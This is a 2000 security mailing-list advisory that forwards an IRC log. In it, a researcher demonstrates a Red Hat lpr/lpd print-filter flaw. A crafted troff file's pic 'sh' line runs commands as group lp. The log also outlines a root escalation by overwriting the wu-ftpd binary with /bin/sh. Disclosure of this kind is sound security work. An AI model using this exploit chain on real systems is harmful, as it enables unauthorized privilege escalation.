Date:         Thu, 26 Oct 2000 15:14:41 -0600
From:         Kurt Seifried <seifried@SECURITYPORTAL.COM>
Subject:      LSLID:2000102605 - lpr
To:           LINUX-SECURITY@LISTSERV.SECURITYPORTAL.COM

LSLID:2000102605

==================

details of an exploit against lpr-0.50-4 (at least)
(also affects other systems that may have the same print filters)

URL       :     http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
AFFECTS   :     lpr-0.50-4 & earlier
SEVERITY  :     local ROOT possible.
SYNOPSIS  :     escalation of group permissions, leading to
                exploit for every user except root is available.
                root is sometimes available as well.
                (wu-ftpd-2.6.0-14.6x binaries are owned by user
                bin, and can be overwritten allowing root access
                if wu-ftpd is installed.)


http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt

This is a log of an advisory given in channel
#roothat on irc.pulltheplug.com, October 16 2000.

!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!

--> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer
printer and j00 get a new group of friends. and stuff.
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000
--- noid gives channel operator status to zen-parse
<bdev> hey zen
<Safety> zen-parse
<Safety> lockdown
<zen-parse> lo all
<bdev> what's this topic all about then zen?
<zen-parse> new hole in lpr package for redhat
<bdev> and...
<bdev> ;]
<bdev> you releasing it ?
--> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat
<zen-parse> [zen@continuity /tmp]$ id
<zen-parse> uid=500(zen) gid=500(zen) groups=500(zen)
<zen-parse> [zen@continuity /tmp]$ cat asdf
<zen-parse> .PS
<zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD
<zen-parse> .PF
<zen-parse> [zen@continuity /tmp]$ lpr asdf
<zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> uid=500(zen) gid=500(zen) groups=7(lp)
<zen-parse> [zen@continuity /tmp]$
<zen-parse> consider it released
<zen-parse> erm... missing a line...
<bdev> heh
<zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
<zen-parse> -rw-rw-rw-   1 zen      zen            39 Oct 16 22:08 /tmp/yougetanyideasyet
<zen-parse> as the output
<bdev> only gid lp ?
<Remmy> ehm
<Remmy> heh
<bdev> but: -r-sr-sr-x   1 root     lp          16292 Jan 10  2000 /usr/bin/lpr*
<-- schematic|ZzZz has quit (Ping timeout)
<zen-parse> that's not where the magic happens though.
<zen-parse> ;]
<zen-parse> needs a running lpd
<zen-parse> and a printer that does troff
<zen-parse> eg: PostScript
<zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<Remmy> zen...write a bugtraq advisory
<Remmy> but get really really stoned first.
<Remmy> hehe
<zen-parse> `grog -Tps -msafer $TMP_FILE`
<zen-parse> log this... use this as an advisory. ;]
<zen-parse> that is where the magic happens.
<zen-parse> grog is a perl script that selects the correct command line options for groff. groff can, if asked, run a variety of other programs, such as eqn (for equations), tbl (for tables) and pic (for compiling pictures).
<zen-parse> the -msafer means to disallow the call to any dangerous functions, such as executing a command or creating or modifying a file.
<zen-parse> However pic is called without that option being passed, even though it does have a -S switch, which runs it in safer mode.
<possem> zen-parse
<zen-parse> The lpd checks what type of file the file is
<zen-parse> with a program called file
<bdev> hmm
<Remmy> looks perty yummy
<zen-parse> the type of this file is troff or preprocessor...
<-- possem has quit (Quit: )
<zen-parse> so the daemon then hands it to the appropriate filters to print, one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<zen-parse> which contains the grog command, which causes groff to run pic on the file, and pic executes the file we specify as the user the file was printed by.
<zen-parse> with one exception.
<zen-parse> you have been set to have a list of groups which just contains one group: lp
<Remmy> hmm
<zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd can run the commands as any user (except root).
<zen-parse> however, if u have wu-ftpd installed, there is a root exploit.
<zen-parse> -rwxr-xr-x   1 bin      bin        162608 Oct 14 19:36 /usr/sbin/in.ftpd
<zen-parse> lrwxrwxrwx   1 bin      bin             7 Sep 23 02:30 /usr/sbin/wu.ftpd -> in.ftpd
<zen-parse> gain user bin, and copy /bin/sh over in.ftpd
<Remmy> heh
<zen-parse> telnet to port 21, and you have root. so it is a root exploit on systems with wu-ftpd. and just every other uid on systems with lpd running.
<zen-parse> )
<bdev> heh, nice
<zen-parse> there also appears to be an error file attempting to be made just after privileges are dropped, but it has insufficient rights at that moment to actually succeed. the directory is owned by root, and only has lp write access because the lpd runs as root.
<zen-parse> um. you dats my advisory ;]
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<Remmy> ew
<zen-parse> -- zen-parse ;]
<Remmy> hehe
<Remmy> i like yer bugtraq posts better...
<Remmy> ya get all the leeto ascii in there and all...
<zen-parse> ok... now ima save the buffer and submit it to bugtraq ;]
<bdev> kewl
--> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat
<bdev> that'd be a cool advisory

!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!

Ob-ASCII

   /\/\    mee-errraaAAgghhhraher!
  = oo =  /
   \()/  /
  / __ \
  ||  ||

in memory of
   lucky.

